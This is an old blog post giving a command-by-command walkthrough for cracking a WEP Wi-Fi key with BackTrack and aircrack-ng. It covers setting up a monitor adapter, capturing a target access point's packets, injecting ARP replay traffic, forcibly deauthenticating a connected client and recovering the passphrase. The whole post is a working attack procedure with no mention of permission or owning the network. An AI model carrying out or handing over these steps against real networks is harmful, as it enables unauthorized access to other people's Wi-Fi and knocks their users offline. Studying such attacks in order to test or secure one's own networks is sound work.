' Wi-Fi Hacking – Crack WEP Wi-Fi Hacking – Crack WEP | Kluwan Backtrack Wi-Fi Hacking – Crack WEP

Minggu, 07 Februari 2010

Wi-Fi Hacking – Crack WEP

To crack WEP at this time, Me using BackTrack OS. Let’s go, open some consoles:
airmon-ng ==> adapter list
airmon-ng stop ath0 ==> destroy adapter virtual
airmon-ng stop ath1 ==> destroy adapter virtual
airmon-ng start wifi0 ==> create new adapter virtual
Console 1:
airodump-ng ath0 ==> scanning
airodump-ng –channel CHANNEL_NUMBER –bssid MAC_AP -w FILE_NAME_SAVE ath0 ==> Capture information
Console 2:
aireplay-ng –arpreplay -b MAC_AP -h MAC_CLIENT ath0 ==> help capture information with arp attack
Console 3:
aireplay-ng –deauth 2 -c MAC_CLIENT -a MAC_AP ath0 ==> help capture information with deauth
While capture information, get the packet as far as u can because that very important to crack WEP.
Final:
aircrack-ng FILE_NAME_SAVE*.cap ==> Cracking
Wait and see the passphrase.
done. ;)
Good Luck… :)

Anda Sudah Baca Yang Ini? :

0 komentar:

Klik Here To Show All Comment


Posting Komentar

newer page older page home
top